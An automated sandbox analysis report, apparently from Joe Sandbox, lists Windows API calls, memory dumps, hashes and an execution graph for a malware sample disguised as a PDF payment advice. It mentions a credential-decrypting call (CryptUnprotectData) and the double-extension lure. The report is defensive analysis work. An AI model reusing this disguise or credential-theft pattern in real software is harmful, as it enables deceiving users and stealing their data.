                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                    • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                    • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                                    • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                    • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                      • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                      • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3585118688-0
                                                                                                                                    • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                    • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                    • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                    • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                    • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 00405AC2
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                    • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 00405B6A
                                                                                                                                    • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3248276644-3081826266
                                                                                                                                    • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                    • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                                    • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                    • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                    • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 1100898210-3081826266
                                                                                                                                    • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                    • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                                    • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                    • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                    • API String ID: 2709904686-224404859
                                                                                                                                    • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                    • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                                    • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                    • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                    • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                    • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                    • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                    • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:11.4%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:2.5%
                                                                                                                                    Total number of Nodes:236
                                                                                                                                    Total number of Limit Nodes:13
                                                                                                                                    execution_graph 39641 3752ce60 39642 3752ce7c 39641->39642 39645 375294b4 39642->39645 39644 3752ce9b 39646 375294bf 39645->39646 39648 3752cf4f 39646->39648 39650 3752cf59 39646->39650 39654 3752cf68 39646->39654 39648->39644 39651 3752cf67 39650->39651 39652 3752d021 39651->39652 39653 375295e8 2 API calls 39651->39653 39652->39652 39653->39652 39655 3752cf7f 39654->39655 39656 3752d021 39655->39656 39657 375295e8 2 API calls 39655->39657 39656->39656 39657->39656 39590 37a520c0 39593 37a520ed 39590->39593 39591 37a5213c 39591->39591 39593->39591 39594 37a517fc 39593->39594 39595 37a51807 39594->39595 39600 37a517d0 39595->39600 39597 37a5229c 39604 375295e8 39597->39604 39598 37a522a5 39598->39591 39601 37a517db 39600->39601 39608 37a5181c 39601->39608 39603 37a522f5 39603->39597 39605 375295f3 39604->39605 39607 3752ec47 39605->39607 39612 3752e7f4 39605->39612 39607->39598 39609 37a51827 39608->39609 39610 37a52461 GetCurrentThreadId 39609->39610 39611 37a5248b 39609->39611 39610->39611 39611->39603 39614 3752e7ff 39612->39614 39613 3752f111 39613->39607 39614->39613 39617 3752faa1 39614->39617 39621 3752fab0 39614->39621 39618 3752fab0 39617->39618 39619 3752fb8a 39618->39619 39625 37a500c0 39618->39625 39622 3752fadb 39621->39622 39623 3752fb8a 39622->39623 39624 37a500c0 2 API calls 39622->39624 39624->39623 39629 37a50104 39625->39629 39633 37a50110 39625->39633 39630 37a50110 CreateWindowExW 39629->39630 39632 37a50234 39630->39632 39632->39632 39634 37a50178 CreateWindowExW 39633->39634 39636 37a50234 39634->39636 39636->39636 39637 37a52020 SetTimer 39638 37a5208c 39637->39638 39658 ad030 39659 ad048 39658->39659 39660 ad0a2 39659->39660 39666 37a51bd0 39659->39666 39672 37a51bc0 39659->39672 39678 37a503f0 39659->39678 39681 37a502b7 39659->39681 39686 37a502c8 39659->39686 39667 37a51bfd 39666->39667 39668 37a51c2f 39667->39668 39691 37a51d58 39667->39691 39700 37a59b48 39667->39700 39705 37a59b38 39667->39705 39673 37a51bd0 39672->39673 39674 37a51c2f 39673->39674 39675 37a51d58 2 API calls 39673->39675 39676 37a59b38 CallWindowProcW 39673->39676 39677 37a59b48 CallWindowProcW 39673->39677 39675->39674 39676->39674 39677->39674 39679 37a50407 39678->39679 39724 37a50841 39678->39724 39679->39660 39682 37a502c8 39681->39682 39684 37a51bc0 2 API calls 39682->39684 39685 37a51bd0 2 API calls 39682->39685 39683 37a5030f 39683->39660 39684->39683 39685->39683 39687 37a502ee 39686->39687 39689 37a51bc0 2 API calls 39687->39689 39690 37a51bd0 2 API calls 39687->39690 39688 37a5030f 39688->39660 39689->39688 39690->39688 39692 37a51d66 39691->39692 39693 37a51d93 39691->39693 39698 37a51d6e 39692->39698 39710 37a51dc0 39692->39710 39693->39692 39694 37a51d98 39693->39694 39695 37a517d0 GetCurrentThreadId 39694->39695 39696 37a51da4 39695->39696 39696->39668 39698->39668 39702 37a59b5c 39700->39702 39701 37a59be8 39701->39668 39714 37a59c00 39702->39714 39717 37a59bef 39702->39717 39706 37a59b48 39705->39706 39708 37a59c00 CallWindowProcW 39706->39708 39709 37a59bef CallWindowProcW 39706->39709 39707 37a59be8 39707->39668 39708->39707 39709->39707 39711 37a51e02 39710->39711 39713 37a51dac 39710->39713 39712 37a51e5a CallWindowProcW 39711->39712 39711->39713 39712->39713 39713->39668 39715 37a59c11 39714->39715 39721 37a5b040 39714->39721 39715->39701 39718 37a59c00 39717->39718 39719 37a59c11 39718->39719 39720 37a5b040 CallWindowProcW 39718->39720 39719->39701 39720->39719 39723 37a51dc0 CallWindowProcW 39721->39723 39722 37a5b05a 39722->39715 39723->39722 39725 37a50856 39724->39725 39727 37a50938 39724->39727 39725->39679 39728 37a50948 39727->39728 39729 37a50965 39728->39729 39731 37a50980 39728->39731 39729->39725 39732 37a509c6 GetCurrentProcess 39731->39732 39734 37a50a11 39732->39734 39735 37a50a18 GetCurrentThread 39732->39735 39734->39735 39736 37a50a55 GetCurrentProcess 39735->39736 39737 37a50a4e 39735->39737 39738 37a50a8b 39736->39738 39737->39736 39743 37a50f31 39738->39743 39745 37a50b4f 39738->39745 39739 37a50ab3 GetCurrentThreadId 39740 37a50ae4 39739->39740 39740->39729 39744 37a50f3a 39743->39744 39744->39739 39749 37a50bc0 39745->39749 39752 37a50bc8 DuplicateHandle 39745->39752 39746 37a50b8e 39746->39739 39750 37a50bc8 DuplicateHandle 39749->39750 39751 37a50c5e 39750->39751 39751->39746 39753 37a50c5e 39752->39753 39753->39746 39639 37a5e708 DispatchMessageW 39640 37a5e774 39639->39640 39754 16b168 39755 16b174 39754->39755 39761 37470188 39755->39761 39765 37470198 39755->39765 39756 16b1a3 39769 37a52730 39756->39769 39762 374701a4 39761->39762 39775 3747c638 39762->39775 39763 374701da 39763->39756 39766 374701a4 39765->39766 39768 3747c638 CryptUnprotectData 39766->39768 39767 374701da 39767->39756 39768->39767 39770 37a5273f 39769->39770 39771 37a50938 6 API calls 39770->39771 39772 37a52746 39771->39772 39807 37a5188c 39772->39807 39777 3747c631 39775->39777 39776 3747caf9 39776->39763 39777->39775 39777->39776 39779 3747cf01 39777->39779 39780 3747cf10 39779->39780 39784 3747d540 39780->39784 39792 3747d550 39780->39792 39781 3747cf80 39781->39777 39785 3747d550 39784->39785 39786 3747d629 